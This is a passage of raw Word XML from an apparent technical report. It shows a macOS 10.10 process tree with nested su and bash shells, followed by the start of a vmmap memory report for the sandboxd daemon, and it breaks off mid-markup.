    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |-+= 00307 root /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> | |-+= 00309 root login -pf root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | | \-+= 00310 root -sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |   \-+= 00340 root su user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |     \-+= 00341 root1 bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |       \-+= 00377 root su root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |         \-+= 00378 root sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |           \-+= 00390 root su user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |             \-+= 00391 root1 bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |               \-+= 00417 root su root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                 \-+= 00419 root sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                   \-+= 00460 root su user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                     \-+= 00461 root1 bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                       \-+= 00576 root su root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                         \-+= 00578 root sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                           \-+= 00618 root su user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                             \-+= 00619 root1 bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                               \-+= 35502 root su root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                                 \-+= 35504 root sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                                   \-+= 35539 root su user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                                     \-+= 35540 root1 bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                                       \-+= 35792 root su root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                                         \-+= 35793 root sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                                           \-+= 35940 root pstree</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | |                                             \--- 35941 root ps -axwwo user,pid,ppid,pgid,command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> | \-+= 35648 root login -pf root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> |   \--= 35649 root -sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00316 root /usr/libexec/systemstatsd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00499 root1 /System/Library/PrivateFrameworks/TCC.framework/Resources/tccd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00673 root /System/Library/PrivateFrameworks/CloudServices.framework/Resources/EscrowSecurityAlert.app/Contents/MacOS/EscrowSecurityAlert</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 01956 root /System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/A/Support/mdflagwriter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 03490 root /usr/libexec/periodic-wrapper daily</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 03493 root /System/Library/PrivateFrameworks/Noticeboard.framework/Versions/A/Resources/nbagent.app/Contents/MacOS/nbagent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 03545 root /System/Library/PrivateFrameworks/Noticeboard.framework/Versions/A/Resources/nbstated</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 03567 root /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 03568 _softwareupdate /System/Library/CoreServices/Software Update.app/Contents/Resources/softwareupdate_download_service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 03571 _assetcache /System/Library/CoreServices/AssetCacheLocatorService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 03572 root /System/Library/PrivateFrameworks/CommerceKit.framework/Versions/A/XPCServices/com.apple.CommerceKit.TransactionService.xpc/Contents/MacOS/com.apple.CommerceKit.TransactionService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 03574 _assetcache /System/Library/PrivateFrameworks/TCC.framework/Resources/tccd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 03681 root1 /System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/A/Support/mdflagwriter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 27217 root /usr/libexec/USBAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 27307 _netbios /usr/sbin/netbiosd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 27467 root /System/Library/CoreServices/AirPlayUIAgent.app/Contents/MacOS/AirPlayUIAgent --launchd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 28252 root /Applications/iBooks.app/Contents/MacOS/iBooks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 28409 root /System/Library/PrivateFrameworks/BookKit.framework/Versions/A/XPCServices/com.apple.BKAgentService.xpc/Contents/MacOS/com.apple.BKAgentService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 28482 root /System/Library/PrivateFrameworks/CommerceKit.framework/Versions/A/Resources/storeuid.app/Contents/MacOS/storeuid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 28505 root /System/Library/PrivateFrameworks/CommerceKit.framework/Versions/A/XPCServices/com.apple.CommerceKit.TransactionService.xpc/Contents/MacOS/com.apple.CommerceKit.TransactionService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 35788 root /System/Library/PrivateFrameworks/DataDetectorsCore.framework/Versions/A/XPCServices/DataDetectorsDynamicData.xpc/Contents/MacOS/DataDetectorsDynamicData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 35891 _spotlight /System/Library/Frameworks/CoreServices.framework/Frameworks/Metadata.framework/Versions/A/Support/mdworker -s mdworker -c MDSImporterWorker -m com.apple.mdworker.shared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> \--= 35906 root /usr/sbin/ocspd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="180" w:name="_Toc411512329"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vmmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="180"/>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc411512330"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sandboxd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Process:         sandboxd [187]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Path:            /usr/libexec/sandboxd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Load Address:    0x1079e4000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Identifier:      sandboxd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Version:         358.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Code Type:       X86-64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Parent Process:  launchd [1]</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Date/Time:       2015-02-11 00:41:06.244 -0800</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>OS Version:      Mac OS X 10.10 (14A389)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Report Version:  7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>Analysis Tool:   /usr/bin/vmmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>----</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Virtual Memory Map of process 187 (sandboxd)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
